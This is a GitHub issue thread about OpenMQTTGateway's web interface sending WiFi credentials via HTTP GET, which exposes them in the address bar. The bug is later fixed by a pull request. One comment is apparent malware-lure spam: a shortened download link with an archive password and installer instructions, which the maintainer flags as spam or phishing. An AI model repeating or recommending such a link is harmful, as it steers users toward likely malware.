### ISSUE TITLE
When changing WiFi password, the password appears in plaintext in the browser address bar

### ISSUE THREAD

**Issue by puterboy** [1technophile/OpenMQTTGateway#2027]
I just noticed that after pressing `save` when changing the WiFi password, the SSID and password appear in **plaintext** in the browser address bar (and presumably go into your browser history too).
This seems like a security issue.
May also apply to MQTT and Gateway passwords but I didn't check.

I imagine data is being sent with an HTTP GET rather than POST.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by puterboy** [comment]
Is that spam????

**Comment by 1technophile** [comment]
Spam or phishing yes

**Comment by 1technophile** [comment]
> I imagine data is being sent with an HTTP GET rather than POST.

Agreed PR welcome to fix that

**Comment by puterboy** [comment]
Fixed with:
https://github.com/1technophile/OpenMQTTGateway/pull/2037
